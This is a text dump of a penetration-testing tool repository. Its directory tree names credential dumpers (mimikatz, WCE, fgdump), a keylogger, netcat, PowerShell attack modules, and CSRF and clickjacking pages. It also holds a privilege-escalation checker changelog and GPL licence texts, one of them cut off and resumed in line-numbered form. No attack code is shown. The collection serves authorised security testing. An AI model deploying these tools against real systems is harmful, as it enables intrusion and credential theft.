├── README.md
├── net
│   ├── Unix
│   │   ├── linuxprivchecker.py
│   │   └── unix-privesc-check-1.4
│   │       ├── CHANGELOG
│   │       ├── COPYING.GPL
│   │       ├── COPYING.UNIX-PRIVESC-CHECK
│   │       └── unix-privesc-check
│   ├── Windows
│   │   ├── EchoMirage-3.1.exe
│   │   ├── HeidiSQL_9.1_Portable
│   │   │   ├── gpl.txt
│   │   │   ├── heidisql.exe
│   │   │   ├── libeay32.dll
│   │   │   ├── libintl.dll
│   │   │   ├── libmysql.dll
│   │   │   ├── libpq.dll
│   │   │   ├── license.txt
│   │   │   ├── plugins
│   │   │   │   └── dialog.dll
│   │   │   ├── portable_settings.txt
│   │   │   └── ssleay32.dll
│   │   ├── ImmunityDebugger_1_85_setup.exe
│   │   ├── PS2EXE-v0.5.0.0
│   │   │   ├── MS-PL.txt
│   │   │   ├── PSEXE.ico
│   │   │   ├── callPS2EXE.bat
│   │   │   ├── createDemo.bat
│   │   │   ├── ps2exe.ps1
│   │   │   └── test.ps1
│   │   ├── PowerTools-master
│   │   │   ├── LICENSE
│   │   │   ├── PewPewPew
│   │   │   │   ├── Invoke-MassCommand.ps1
│   │   │   │   ├── Invoke-MassMimikatz.ps1
│   │   │   │   ├── Invoke-MassSearch.ps1
│   │   │   │   ├── Invoke-MassTemplate.ps1
│   │   │   │   ├── Invoke-MassTokens.ps1
│   │   │   │   └── README.md
│   │   │   ├── PowerPick
│   │   │   │   ├── PowerPick.sln
│   │   │   │   ├── PowerPick
│   │   │   │   │   ├── PowerPick.csproj
│   │   │   │   │   ├── PowerPick.csproj.user
│   │   │   │   │   ├── Program.cs
│   │   │   │   │   ├── Properties
│   │   │   │   │   │   ├── AssemblyInfo.cs
│   │   │   │   │   │   ├── Resources.Designer.cs
│   │   │   │   │   │   └── Resources.resx
│   │   │   │   │   ├── bin
│   │   │   │   │   │   ├── Debug
│   │   │   │   │   │   │   ├── PowerPick.vshost.exe
│   │   │   │   │   │   │   └── PowerPick.vshost.exe.manifest
│   │   │   │   │   │   └── Release
│   │   │   │   │   │       ├── PowerPick.exe
│   │   │   │   │   │       └── PowerPick.pdb
│   │   │   │   │   └── obj
│   │   │   │   │       └── x86
│   │   │   │   │           └── Release
│   │   │   │   │               ├── DesignTimeResolveAssemblyReferencesInput.cache
│   │   │   │   │               ├── PowerPick.Properties.Resources.resources
│   │   │   │   │               ├── PowerPick.csproj.FileListAbsolute.txt
│   │   │   │   │               ├── PowerPick.csproj.GenerateResource.Cache
│   │   │   │   │               ├── PowerPick.csprojResolveAssemblyReference.cache
│   │   │   │   │               ├── PowerPick.exe
│   │   │   │   │               ├── PowerPick.pdb
│   │   │   │   │               └── TempPE
│   │   │   │   │                   └── Properties.Resources.Designer.cs.dll
│   │   │   │   └── README.md
│   │   │   ├── PowerUp
│   │   │   │   ├── PowerUp.ps1
│   │   │   │   ├── PowerUp.psd1
│   │   │   │   ├── PowerUp.psm1
│   │   │   │   └── README.md
│   │   │   ├── PowerView
│   │   │   │   ├── LICENSE
│   │   │   │   ├── README.md
│   │   │   │   ├── functions
│   │   │   │   │   ├── Get-Net.ps1
│   │   │   │   │   ├── Get-NetLoggedon.ps1
│   │   │   │   │   ├── Get-NetSessions.ps1
│   │   │   │   │   ├── Get-NetShare.ps1
│   │   │   │   │   ├── Invoke-Netview.ps1
│   │   │   │   │   ├── Invoke-ShareFinder.ps1
│   │   │   │   │   └── Invoke-UserHunter.ps1
│   │   │   │   ├── powerview.ps1
│   │   │   │   ├── powerview.psd1
│   │   │   │   └── powerview.psm1
│   │   │   └── README.md
│   │   ├── SysinternalsSuite
│   │   │   ├── ADExplorer.exe
│   │   │   ├── ADInsight.chm
│   │   │   ├── ADInsight.exe
│   │   │   ├── AccessEnum.exe
│   │   │   ├── AdExplorer.chm
│   │   │   ├── Autologon.exe
│   │   │   ├── Bginfo.exe
│   │   │   ├── Cacheset.exe
│   │   │   ├── Clockres.exe
│   │   │   ├── Contig.exe
│   │   │   ├── Coreinfo.exe
│   │   │   ├── DISKMON.HLP
│   │   │   ├── DMON.SYS
│   │   │   ├── Dbgview.exe
│   │   │   ├── Desktops.exe
│   │   │   ├── Disk2vhd.chm
│   │   │   ├── DiskView.exe
│   │   │   ├── Diskmon.exe
│   │   │   ├── Eula.txt
│   │   │   ├── FindLinks.exe
│   │   │   ├── Listdlls.exe
│   │   │   ├── LoadOrd.exe
│   │   │   ├── PORTMON.CNT
│   │   │   ├── PORTMON.HLP
│   │   │   ├── Procmon.exe
│   │   │   ├── PsExec.exe
│   │   │   ├── PsGetsid.exe
│   │   │   ├── PsInfo.exe
│   │   │   ├── PsLoggedon.exe
│   │   │   ├── PsService.exe
│   │   │   ├── Pstools.chm
│   │   │   ├── RAMMap.exe
│   │   │   ├── RegDelNull.exe
│   │   │   ├── RootkitRevealer.chm
│   │   │   ├── RootkitRevealer.exe
│   │   │   ├── ShareEnum.exe
│   │   │   ├── ShellRunas.exe
│   │   │   ├── Sysmon.exe
│   │   │   ├── TCPVIEW.HLP
│   │   │   ├── Tcpvcon.exe
│   │   │   ├── Tcpview.exe
│   │   │   ├── Vmmap.chm
│   │   │   ├── Volumeid.exe
│   │   │   ├── WINOBJ.HLP
│   │   │   ├── Winobj.exe
│   │   │   ├── ZoomIt.exe
│   │   │   ├── accesschk.exe
│   │   │   ├── adrestore.exe
│   │   │   ├── autoruns.chm
│   │   │   ├── autoruns.exe
│   │   │   ├── autorunsc.exe
│   │   │   ├── ctrl2cap.amd.sys
│   │   │   ├── ctrl2cap.exe
│   │   │   ├── ctrl2cap.nt4.sys
│   │   │   ├── ctrl2cap.nt5.sys
│   │   │   ├── dbgview.chm
│   │   │   ├── disk2vhd.exe
│   │   │   ├── diskext.exe
│   │   │   ├── du.exe
│   │   │   ├── efsdump.exe
│   │   │   ├── handle.exe
│   │   │   ├── hex2dec.exe
│   │   │   ├── junction.exe
│   │   │   ├── ldmdump.exe
│   │   │   ├── livekd.exe
│   │   │   ├── logonsessions.exe
│   │   │   ├── movefile.exe
│   │   │   ├── ntfsinfo.exe
│   │   │   ├── pagedfrg.exe
│   │   │   ├── pagedfrg.hlp
│   │   │   ├── pendmoves.exe
│   │   │   ├── pipelist.exe
│   │   │   ├── portmon.exe
│   │   │   ├── procdump.exe
│   │   │   ├── procexp.chm
│   │   │   ├── procexp.exe
│   │   │   ├── procmon.chm
│   │   │   ├── psfile.exe
│   │   │   ├── pskill.exe
│   │   │   ├── pslist.exe
│   │   │   ├── psloglist.exe
│   │   │   ├── pspasswd.exe
│   │   │   ├── psping.exe
│   │   │   ├── psshutdown.exe
│   │   │   ├── pssuspend.exe
│   │   │   ├── psversion.txt
│   │   │   ├── readme.txt
│   │   │   ├── regjump.exe
│   │   │   ├── ru.exe
│   │   │   ├── sdelete.exe
│   │   │   ├── sigcheck.exe
│   │   │   ├── streams.exe
│   │   │   ├── strings.exe
│   │   │   ├── sync.exe
│   │   │   ├── tcpview.chm
│   │   │   ├── vmmap.exe
│   │   │   └── whois.exe
│   │   ├── WiresharkPortable-1.12.3.paf.exe
│   │   ├── exe2bat.exe
│   │   ├── fgdump.exe
│   │   ├── klogger.exe
│   │   ├── mimikatz_trunk
│   │   │   ├── README.md
│   │   │   ├── Win32
│   │   │   │   ├── mimidrv.sys
│   │   │   │   ├── mimikatz.exe
│   │   │   │   └── mimilib.dll
│   │   │   └── x64
│   │   │       ├── mimidrv.sys
│   │   │       ├── mimikatz.exe
│   │   │       └── mimilib.dll
│   │   ├── nc.exe
│   │   ├── nc.txt
│   │   ├── plink.exe
│   │   ├── pscp.exe
│   │   ├── radmin.exe
│   │   ├── sbd.exe
│   │   ├── vncviewer.exe
│   │   ├── wce_v1_42beta_x32
│   │   │   ├── Changelog
│   │   │   ├── LICENSE.txt
│   │   │   ├── README
│   │   │   ├── getlsasrvaddr.exe
│   │   │   └── wce.exe
│   │   ├── wce_v1_42beta_x64
│   │   │   ├── Changelog
│   │   │   ├── LICENSE.txt
│   │   │   ├── README
│   │   │   └── wce.exe
│   │   ├── wget.exe
│   │   └── whoami.exe
│   └── help.md
├── snippets
│   ├── android
│   │   └── help.md
│   ├── bash
│   │   └── README.md
│   ├── powershell
│   │   └── README.md
│   └── python
│       └── README.md
└── web
    ├── burpsuite_free_v1.6.jar
    ├── clickjacking_bypass.html
    ├── clickjacking_outter_frame.html
    ├── csrf.html
    ├── help.md
    └── jquery-1.11.2.min.js

/README.md:
--------------------------------------------------------------------------------
Pentesting dump
=======

Scripts, tools, and proof-of-concepts that can be handy during a penetration test.
--------------------------------------------------------------------------------

/net/Unix/unix-privesc-check-1.4/CHANGELOG:
--------------------------------------------------------------------------------

2008-11-23 unix-privesc-check v1.4

* Added check of file perms of shared libraries used by SUID programs.
* Tidied output slightly.

2008-11-09 unix-privesc-check v1.3

* Bug fix: Parts of the script only worked with /bin/bash and not /bin/sh
* Bug fix: Fixed typos in reporting for privescs via cron.

2008-07-06 unix-privesc-check v1.2

* Added check of library dirs (/etc/ld.so.conf) for Linux
* Crude check of programs called from shell scripts
* Check of libraries used by each binary program (using ldd)
* Check of hard-coded paths within binaries (using strings)
* More verbose WARNING messages. All the explanation for a WARNING
  should now be on one line so you can grep for 'WARNING' and still
  understand the results
* Check of file perms on open file handles of running processes
* Check for running SSH agent. Lists keys if possible.
* Check for public and private SSH keys in home directories.
* Check for running GPG agent.
* Check for cron jobs in /var/spool/cron/tabs
* Extra non-priv check for local postgres trusts
* Bug fix: lanscan now used on HPUX to get interface names
* Check if system is an NFS client (HPUX only)
* Check if swap space is readable / writable

2008-04-17 unix-privesc-check v1.1

* Added check for accounts with no password in /etc/passwd
* Record some basic info about the host (hostname, uname -a, interface IPs)

2008-02-01 unix-privesc-check v1.0

* Initial public release

--------------------------------------------------------------------------------

/net/Unix/unix-privesc-check-1.4/COPYING.GPL:
--------------------------------------------------------------------------------
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991

Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.

Preamble

The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.

When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.

To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.

For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.

We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.

Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.

Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.

The precise terms and conditions for copying, distribution and
modification follow.

GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION

0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".

Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.

1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.

You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.

2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:

    a) You must cause the modified files to carry prominent notices
    stating that you changed the files and the date of any change.

    b) You must cause any work that you distribute or publish, that in
    whole or in part contains or is derived from the Program or any
    part thereof, to be licensed as a whole at no charge to all third
    parties under the terms of this License.

    c) If the modified program normally reads commands interactively
    when run, you must cause it, when started running for such
    interactive use in the most ordinary way, to print or display an
    announcement including an appropriate copyright notice and a
    notice that there is no warranty (or else, saying that you provide
    a warranty) and that users may redistribute the program under
    these conditions, and telling the user how to view a copy of this
    License. (Exception: if the Program itself is interactive but
    does not normally print such an announcement, your work based on
    the Program is not required to print an announcement.)

These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.

Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.

In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.

3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:

    a) Accompany it with the complete corresponding machine-readable
    source code, which must be distributed under the terms of Sections
    1 and 2 above on a medium customarily used for software interchange; or,

    b) Accompany it with a written offer, valid for at least three
    years, to give any third party, for a charge no more than your
    cost of physically performing source distribution, a complete
    machine-readable copy of the corresponding source code, to be
    distributed under the terms of Sections 1 and 2 above on a medium
    customarily used for software interchange; or,

    c) Accompany it with the information you received as to the offer
    to distribute corresponding source code. (This alternative is
    allowed only for noncommercial distribution and only if you
    received the program in object code or executable form with such
    an offer, in accord with Subsection b above.)

The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.

If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.

4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.

5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.

6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.

7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.

If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.

It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.

This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.

8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.

9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.

Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.

10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.

NO WARRANTY

11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.

12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.

END OF TERMS AND CONDITIONS

How to Apply These Terms to Your New Programs

If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.

To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.


    Copyright (C)

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License along
    with this program; if not, write to the Free Software Foundation, Inc.,
    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

Also add information on how to contact you by electronic and paper mail.

If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:

    Gnomovision version 69, Copyright (C) year name of author
    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
    This is free software, and you are welcome to redistribute it
    under certain conditions; type `show c' for details.

The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.

You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:

    Yoyodyne, Inc., hereby disclaims all copyright interest in the program
    `Gnomovision' (which makes passes at compilers) written by James Hacker.

    , 1 April 1989
    Ty Coon, President of Vice

This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License.

--------------------------------------------------------------------------------

/net/Unix/unix-privesc-check-1.4/COPYING.UNIX-PRIVESC-CHECK:
--------------------------------------------------------------------------------
This tool may be used for legal purposes only. Users take full responsibility
for any actions performed using this tool. The author accepts no liability for
damage caused by this tool. If these terms are not acceptable to you, then
you are not permitted to use this tool.

In all other respects the GPL version 2 applies.

--------------------------------------------------------------------------------

/net/Windows/EchoMirage-3.1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/EchoMirage-3.1.exe
--------------------------------------------------------------------------------

/net/Windows/HeidiSQL_9.1_Portable/gpl.txt:
--------------------------------------------------------------------------------
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991

Copyright (C) 1989, 1991 Free Software Foundation, Inc.
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.

Preamble

The licenses for most software are designed to take away your
freedom to share and change it.
You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 
165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. 
If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. 
If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 
